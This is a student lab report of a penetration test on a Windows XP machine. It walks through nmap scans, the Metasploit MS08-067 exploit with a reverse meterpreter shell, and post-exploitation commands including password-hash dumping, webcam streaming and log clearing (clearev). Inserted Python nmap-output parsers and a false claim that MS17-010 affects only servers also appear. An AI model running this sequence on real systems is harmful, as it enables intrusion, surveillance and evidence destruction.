Vulnerability Assessment & Penetration Testing Report | ICSS Student – Vivek Kumar

Vulnerability Assessment & Penetration Testing Report [on Windows XP]

Vulnerability is a cyber-security term that refers to a flaw in a system that can leave it open to attack. A vulnerability may also refer to any type of weakness in a computer system itself, in a set of procedures, or in anything that leaves information security exposed to a threat.

Vulnerability Assessment & Penetration Testing Report done by ICSS student Vivek Kumar. The full project is discussed below:

 

Project Name: Vulnerability Assessment & Penetration Testing

Author Name: Vivek Kumar

Publish Date: 24-07-2018

 

Table of Contents

 

Reconnaissance

Vulnerability Scanning

Attack and Penetration

Post-Exploitation

Solution & Recommendation

 

 

Reconnaissance

 

The first part of a VAPT is information gathering about the target network or machine. In our case the target is a Windows XP/2003 machine on the same network as the attacking machine.

First we run an nmap scan to find the live hosts.

 


 

Now we need to separate out the live IP addresses, so we save the above result in a text file and then filter the IP addresses using the commands:

nmap -sV -sP 192.168.31.1-255 > host.txt
cat host.txt | grep "for" | cut -d " " -f5 > ip.txt

The output is:

 


 

Now we have to check which of them is a Windows XP machine, so we run nmap's OS detection (-O) against all the live IPs:

nmap -sV -O -iL ip.txt > os.txt

 

The output is:

 

Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-16 23:55 IST
Nmap scan report for XiaoQiang (192.168.31.1)
Host is up (0.0013s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE VERSION
53/tcp   open  domain  dnsmasq 2.71
80/tcp   open  http    nginx (bad gateway)
8192/tcp open  http    Tengine httpd
8193/tcp open  http    nginx
8899/tcp open  http    Tengine httpd
MAC Address: 78:11:DC:18:76:21 (Xiaomi Electronics,co.)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

TCP/IP fingerprint: [opaque OS:SCAN fingerprint block omitted]

 

Network Distance: 1 hop

Nmap scan report for 192.168.31.44
Host is up (0.041s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
MAC Address: F2:03:71:B7:A4:27 (Unknown)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.12 - 4.10
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 192.168.31.112
Host is up (0.017s latency).
All 1000 scanned ports on 192.168.31.112 are closed
MAC Address: 64:CC:2E:96:75:69 (Xiaomi Communications)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

Nmap scan report for 192.168.31.224
Host is up (0.042s latency).
Not shown: 996 closed ports
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
2869/tcp open  http         Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
MAC Address: F2:03:71:B7:A4:27 (Unknown)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
Network Distance: 1 hop
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 5 IP addresses (4 hosts up) scanned in 60.99 seconds

 

The host marked in yellow above, 192.168.31.224, is our target machine.
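As an added example (not part of the student's report), here is a Python parser for the nmap text output above. It is a more robust replacement for the grep/cut pipeline used earlier: on a line such as "Nmap scan report for XiaoQiang (192.168.31.1)" the fifth space-separated field is the hostname, not the IP, so cut -f5 silently loses that host. The sample input is constructed from the output above and abbreviated.

```python
import re

# Constructed sample, abbreviated from the nmap -sV -O output shown above.
SAMPLE_OS_TXT = """\
Nmap scan report for XiaoQiang (192.168.31.1)
Host is up (0.0013s latency).
53/tcp   open  domain  dnsmasq 2.71
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Nmap scan report for 192.168.31.44
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
Running: Linux 3.X|4.X
Nmap scan report for 192.168.31.224
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
Running: Microsoft Windows XP|2003
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
Nmap done: 5 IP addresses (3 hosts up) scanned in 60.99 seconds
"""

# "Nmap scan report for <ip>" or "Nmap scan report for <hostname> (<ip>)"
REPORT_RE = re.compile(r"^Nmap scan report for (?:(\S+) \()?(\d+\.\d+\.\d+\.\d+)\)?$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")

def field5_like_cut(text):
    """What the report's grep 'for' | cut -d ' ' -f5 pipeline yields per matching line."""
    return [(line.split(" ") + [""] * 5)[4] for line in text.splitlines() if "for" in line]

def parse_nmap_text(text):
    """Group nmap's normal text output into {ip: {"hostname", "ports", "os"}}."""
    hosts, cur = {}, None
    for line in text.splitlines():
        m = REPORT_RE.match(line)
        if m:  # start of a new host block; the IP is always the last field
            cur = hosts.setdefault(m.group(2), {"hostname": m.group(1), "ports": [], "os": []})
            continue
        if cur is None:
            continue
        m = PORT_RE.match(line)
        if m:  # open port: (number, service, version banner)
            cur["ports"].append((int(m.group(1)), m.group(3), m.group(4).strip()))
        elif line.startswith(("Running:", "OS details:")):
            cur["os"].append(line.split(":", 1)[1].strip())
    return hosts

def hosts_matching(hosts, pattern):
    """IPs whose OS guess or any service banner matches pattern, e.g. r"Windows XP"."""
    rx = re.compile(pattern, re.IGNORECASE)
    return sorted(ip for ip, h in hosts.items()
                  if any(rx.search(s) for s in h["os"] + [v for _, _, v in h["ports"]]))
```

Running hosts_matching(parse_nmap_text(SAMPLE_OS_TXT), r"Windows XP") returns the single candidate the report identified, while field5_like_cut shows the router being reported under its hostname rather than its IP.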

 


 

With our target identified, we move on to the next step.

 

Vulnerability Scanning

 

In this part we scan the target for known vulnerabilities. Again we use nmap, this time running its vuln script category, which checks the system for known vulnerabilities.

 

nmap -Pn --script vuln 192.168.31.224 > vuln.txt

The output is:

 

Starting Nmap 7.60 ( https://nmap.org ) at 2018-07-16 14:12 IST
Nmap scan report for 192.168.31.224
Host is up (0.0022s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
2869/tcp open  icslap

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|            The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|            Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|            code via a crafted RPC request that triggers the overflow during path canonicalization.
|
|     Disclosure date: 2008-10-23
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|         servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 17.10 seconds

 

 

The above result shows the vulnerabilities found, marked in yellow; they are as follows:

 

|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED

 

This vulnerability exists but does not provide any user access, so it can't be used. The next one is

 

smb-vuln-ms08-067: This vulnerability allows a user to gain remote access to the target system, and it exists on the Windows XP/2003 machine which is our target.

The last one listed is smb-vuln-ms17-010:

 

This vulnerability also allows users to gain remote access to the target system, but it is not available for the Windows XP/2003 machine; it only exists in Windows servers.

 

So now we will use the ms08_067 vulnerability to exploit the machine using Metasploit.
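As an added example (not the report's own code), the following Python script parses the NSE host script results above into structured findings and applies the same triage the text does: only scripts whose State is VULNERABLE count as confirmed, a "false" or NT_STATUS_ACCESS_DENIED result is not a finding, and scripts that errored out are flagged for a rerun with -d rather than treated as clean. The sample input is constructed from the output above and abbreviated.

```python
import re

# Constructed sample, abbreviated from the --script vuln host script results shown above.
SAMPLE_VULN_TXT = """\
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067:
|   VULNERABLE:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
Nmap done: 1 IP address (1 host up) scanned in 17.10 seconds
"""

# A script's own line follows "|" or "|_" directly; its details are indented further.
SCRIPT_RE = re.compile(r"^\|_? ?([\w.-]+):\s*(.*)$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")

def parse_script_results(text):
    """Map each NSE script name to its state, risk factor and CVE ids."""
    findings, cur = {}, None
    for line in text.splitlines():
        m = SCRIPT_RE.match(line)
        if m:  # one-line verdict (false / ERROR / NT_STATUS_...) or a multi-line header
            name, verdict = m.groups()
            cur = findings[name] = {"state": verdict or "UNKNOWN", "risk": None,
                                    "cves": CVE_RE.findall(name.upper())}
        elif cur is not None and line.startswith("|"):  # detail line of the current script
            detail = line.lstrip("|_ ").strip()
            if detail.startswith("State:"):
                cur["state"] = detail.split(":", 1)[1].strip()
            elif detail.startswith("Risk factor:"):
                cur["risk"] = detail.split(":", 1)[1].strip()
            cur["cves"] += [c for c in CVE_RE.findall(detail) if c not in cur["cves"]]
    return findings

def confirmed(findings):
    """Scripts that positively confirmed a vulnerability; 'false', errors and access-denied are not findings."""
    return sorted(n for n, f in findings.items() if f["state"] == "VULNERABLE")

def to_recheck(findings):
    """Scripts that errored out: rerun with -d before treating that check as clean."""
    return sorted(n for n, f in findings.items() if f["state"].startswith("ERROR"))
```

On the sample, confirmed() returns the two VULNERABLE scripts with their CVE ids, and to_recheck() returns smb-vuln-ms10-061, which the scan could not evaluate at all.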

 

Attack and Penetration

 

To perform this attack we use msfconsole. The Metasploit framework has a huge collection of exploits, payloads and modules which are used by the hacking community.

 

It is launched by typing msfconsole in the terminal.

 

Now we search for the ms08_067 exploit module by typing: search ms08_067

 


 

The following commands are used:

use exploit/windows/smb/ms08_067_netapi
show payloads

This shows a list of payloads which can be used to perform the attack. We are going to use the windows/meterpreter/reverse_tcp payload:

 

set payload windows/meterpreter/reverse_tcp

 

show options

set rhost 192.168.31.224    (target IP address)
set lhost 192.168.31.44     (attacker IP address)

 

 


 

The final command, which executes the attack, is exploit.

 


 

 

Post-Exploitation

 

Once we get a meterpreter session we own the target machine and can do anything we want; for example, we can escalate privileges with the command

getsystem

To confirm, check the IP address by typing ifconfig.

 


 

We have a lot of options, which can be listed by typing help. The most common ones are:

getsystem
sysinfo
getuid
hashdump
webcam_stream
download
cd
ls
reboot

 

Finally, we clear our footprints using the command clearev.

 

 

Solution & Recommendation

 

This particular vulnerability was patched by Microsoft a long time ago, so simply performing a Windows Update will patch it automatically.

 

One should always keep one's system and programs updated.

This habit alone gives a lot of protection, as up-to-date software is unlikely to have any known vulnerability.

 

Also, Windows XP is very old, so users should upgrade to the latest OS, which is Windows 10. A good antivirus should be used and updated regularly. The firewall should be kept on. Contact a professional to perform regular checks.

 

See the full process in the video given below:

 

 

 

 
